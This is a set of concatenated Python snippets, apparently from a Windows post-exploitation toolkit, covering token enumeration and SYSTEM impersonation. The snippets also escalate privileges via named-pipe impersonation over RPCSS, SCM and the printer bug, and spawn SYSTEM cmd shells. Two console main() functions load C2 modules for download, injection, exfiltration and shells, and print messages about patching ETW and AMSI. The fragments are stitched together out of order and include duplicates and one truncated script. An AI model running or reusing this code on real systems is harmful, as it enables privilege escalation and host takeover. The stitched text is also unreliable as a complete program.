def printalltokensbyname(args): printT( "All tokens which are accessible from current thread by account name:") imp = Impersonate() imp.printTokensAccessibleByAccountNameAndPID( targetPID=args['pid'], oneMaxByPid=args['oneMaxByPid'], _useThreadMethod=args['_useThreadMethod'])
def printsystemtokens(args): printT( "All nt authority\\system tokens which are accessible from current thread:" ) imp = Impersonate() imp.printSystemTokensAccessible( targetPID=args['pid'], oneMaxByPid=args['oneMaxByPid'], impersonationPossibleOnly=args['impPossibleOnly'], printFull=args['printFull'])
def cangetadmin(args): ''' ''' printT("Current thread is be able to get administrator access:") imp = Impersonate() status = imp.canGetAdminAccess() if status == True: printG("Yes. Current thread is be able to get administrator access") else: printB("No. Current thread is NOT able to get administrator access")
def scm(args): if args["toSystem"] == True: printT("Try to spawn a system shell via scm & impersonation...") esc = Escalation() imp = Impersonate() status = esc.namedPipeImpersonationSystemViaSCM(ps=True, debug=False) imp.printCurrentThreadEffectiveToken() if status == True: imp = Impersonate() imp.executeCMDWithThreadEffectiveToken()
def main(): global _username, _domain, _classes, prevId init() print(Fore.WHITE + Style.BRIGHT + printBanner(), end='') with open(baseWritePath + prevId, 'r') as f: first = json.load(f) nextId = ''.join( random.choice(string.ascii_uppercase + string.digits) for _ in range(10)) first['NextId'] = nextId with open(baseWritePath + prevId, 'w') as f: json.dump(first, f) prevId = nextId content = waitAndReadFile(baseReadPath + prevId) print("[+] Connection successfully established!") time.sleep(3) print("[+] Patching ETW...") time.sleep(7) print("[+] Manually loading kernel32.dll to avoid API hooks.") time.sleep(7) print("[+] Manually loading advapi32.dll to avoid API hooks.") time.sleep(5) print("[+] Patching AMSI...") time.sleep(5) print("[+] H4ck th3 Pl4n3t!") userAndDomain = content['Output'] userAndDomain = userAndDomain.split("\\") _domain = userAndDomain[0] _username = userAndDomain[1] _classes.append(Download()) _classes.append(Base64encode()) _classes.append(Base64decode()) _classes.append(Compile()) _classes.append(Inject()) _classes.append(Powershell()) _classes.append(Send()) _classes.append(Impersonate()) _classes.append(Exfiltrate()) _classes.append(Runas()) _classes.append(Shell()) mainConsole() deinit()
def rpcss(args): printT("Trying to exploit 'RPCSS'...") printT("It can take many seconds, so wait...") esc = Escalation() status = esc.namedPipeImpersonationSystemViaRPCSS() if status == True: imp = Impersonate() imp.enableAllUserRights() imp.executeCMDWithThreadEffectiveToken() else: logging.error("Impossible to exploit 'RPCSS'")
def main(): global _username,_domain,_classes, prevId init() print(Fore.WHITE + Style.BRIGHT + printBanner() , end='') with open(baseWritePath + prevId, 'r') as f: first = json.load(f) nextId = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10)) first['NextId'] = nextId with open(baseWritePath + prevId, 'w') as f: json.dump(first, f) prevId = nextId content = waitAndReadFile(baseReadPath + prevId) userAndDomain = content['Output'] userAndDomain = userAndDomain.split("\\") _domain = userAndDomain[0] _username = userAndDomain[1] _classes.append(Download()) _classes.append(Execute()) _classes.append(Move()) _classes.append(Base64encode()) _classes.append(Base64decode()) _classes.append(Compile()) _classes.append(Inject()) _classes.append(Downexec()) _classes.append(Powershell()) _classes.append(Send()) _classes.append(Impersonate()) _classes.append(Exfiltrate()) _classes.append(Runas()) _classes.append(Shell()) mainConsole() deinit()
def searchimpfirstsystem(args): ''' Impersonate the first system token which is available and prompt a cmd.exe. :param args: :return: True if success, otherwise false ''' printT("Searching and impersonating first nt authority\\system token...") imp = Impersonate() status = imp.searchAndImpersonateFirstSystemToken(targetPID=args['pid'], printAllTokens=False) if status == True: imp.enableAllUserRights() imp.executeCMDWithThreadEffectiveToken() printT("cmd.exe prompt started as system") return True else: logging.error("Impossible to prompt a cmd.exe as system.") return False
def impuser(args): if args['username'] == None or args['password'] == None: logging.error("username or password has to be given") else: printT("Try to impersonate via creds...") imp = Impersonate() status = imp.impersonateViaCreds( login=args['username'], password=args['password'], domain=args['domain'], logonType=LOGON32_LOGON_INTERACTIVE, logonProvider=LOGON32_PROVIDER_DEFAULT) if status == True: printT("Impersonation success, try to spawn a shell...") printT( "SE_INCREASE_QUOTA_NAME and SE_ASSIGNPRIMARYTOKEN_NAME should be required" ) imp.printCurrentThreadEffectiveToken(printFull=True, printLinked=False) imp.executeCMDWithThreadEffectiveToken() else: logging.error("Impossible to impersonate via creds")
def namedPipeImpersonationSystemViaRPCSS(self): """ Impersonate SYSTEM account thanks to Network Service and named pipe via RPCSS :return: True or False (if an error) """ logging.debug( "Starting named pipe impersonation via RPCSS & Network Service...") status = self.__namedPipeImpersonation( functionMethod=self.__createSimpleNamedPipeConnection, pipeName=None, ps=False) imp = Impersonate() allTokens = imp.getAllTokensAccessible(targetPID=None) #imp.printTokensAccessibleByAccountNameAndPID() status = imp.impersonateFirstSystemToken(allTokens) imp.closeAllHandles(allTokens) return status
def printalltokens(args): ''' ''' printT("All tokens which are accessible from current thread:") if 'currentpidonly' in args and args['currentpidonly'] == True: args['pid'] = GetCurrentProcessId() imp = Impersonate() if args['filter'] == '': imp.printAllTokensAccessible(targetPID=args['pid'], printFull=args['printFull'], printLinked=args['printLinked'], _useThreadMethod=args['_useThreadMethod']) else: filter = json.loads(args['filter']) imp.printTokensAccessibleFilter( targetPID=args['pid'], filter=filter, printFull=args['printFull'], printLinked=args['printLinked'], _useThreadMethod=args['_useThreadMethod'])
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() print("Print current effective token for current thread:") imp.printCurrentThreadEffectiveToken(printFull=True, printLinked=True)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation from impersonate import Impersonate esc = Escalation() esc.namedPipeImpersonationSystemViaPrinterBug() imp = Impersonate() imp.enableAllUserRights() #Not necessary but we can do it, we do it imp.executeCMDWithThreadEffectiveToken()
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() imp.printTokensAccessibleByAccountNameAndPID(targetPID=None, oneMaxByPid=False, _useThreadMethod=False)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() imp.searchAndImpersonateFirstSystemToken(targetPID=None, printAllTokens=False)
def imptoken(args): if args['pid'] == None: logging.error("A pid has to be selected") else: if args['ihandle'] == None: printT("Impersonating primary token of pid {0}".format( args['pid'])) else: printT("Impersonating token of the thread ihandle {0} of pid {1}". format(args['ihandle'], args['pid'])) imp = Impersonate() imp.enableAllUserRights() status = imp.impersonateThisToken(pid=args['pid'], iHandle=args['ihandle']) if status == True: printT("Trying to open a cmd shell...") printT( "NOTICE: If not enough privileges for targeted pid, you can't open a cmd.exe shell" ) imp.printCurrentThreadEffectiveToken() imp.enableAllUserRights() imp.executeCMDWithThreadEffectiveToken() else: logging.error("Impossible to impersonate")
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation from impersonate import Impersonate import subprocess import time esc = Escalation() esc.namedPipeImpersonationSystemViaRPCSS() imp = Impersonate() imp.enableAllUserRights() #required, othwerwise not enough privileges imp.executeWithThreadEffectiveToken(appName=sys.argv[1])
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * from windef import TokenImpersonation configureLogging() imp = Impersonate() #Get all 'impersonation' tokens wich can be impersonated and which are 'system' allTokens = imp.getTokensAccessibleFilter(targetPID=None, filter={ 'canimpersonate': True, 'sid': 'S-1-5-18', 'type': TokenImpersonation }, _useThreadMethod=False) if allTokens == {} or allTokens == None: print("No one token found for impersonation") else: #use the first token of the first pid returned in 'allTokens' pid = list(allTokens.keys())[0] firstIHandle = allTokens[pid][0]['ihandle'] imp.printThisToken(allTokens, pid, firstIHandle) imp.impersonateThisToken(pid=pid, iHandle=firstIHandle) print("Current Effective token for current thread after impersonation:") imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False) imp.terminateImpersonation() print(
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() print( "Print limited information about all 'nt authority\system' tokens accessible and which can be impersonated:" ) imp.printSystemTokensAccessible(targetPID=None, oneMaxByPid=False, impersonationPossibleOnly=True, printFull=False)
def printalltokensbypid(args): printT("All tokens which are accessible from current thread by PID:") imp = Impersonate() imp.printTokensAccessibleByPID(targetPID=args['pid'], impPossibleOnly=args['impPossibleOnly'], _useThreadMethod=args['_useThreadMethod'])
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() print("Is current user can have administration access", imp.canGetAdminAccess())
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() print( "Print limited information about all 'nt authority\system' tokens accessible:" ) imp.printTokensAccessibleFilter(targetPID=None, filter={ 'intlvl': 'System', 'sid': 'S-1-5-18' }, printFull=False, printLinked=False, _useThreadMethod=False)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() print("Print limited information about all tokens which can be impersonated:") imp.printTokensAccessibleFilter(targetPID=None, filter={'canimpersonate':True,}, printFull=False, printLinked=False, _useThreadMethod=False)
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() imp.impersonateViaCreds(login='******', password='******', domain="theDOMAIN", logonType=LOGON32_LOGON_INTERACTIVE, logonProvider=LOGON32_PROVIDER_DEFAULT) imp.printCurrentThreadEffectiveToken(printFull=False, printLinked=False) imp.terminateImpersonation()
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() pid = getPIDfromName('lsass.exe') imp = Impersonate() imp.printAllTokensAccessible(targetPID=pid, printFull=False, printLinked=False, _useThreadMethod=False)
import sys sys.path.append('../') from impersonate import Impersonate from utils import * configureLogging() imp = Impersonate() imp.printAllTokensAccessibleWithRecursiveImpersonation()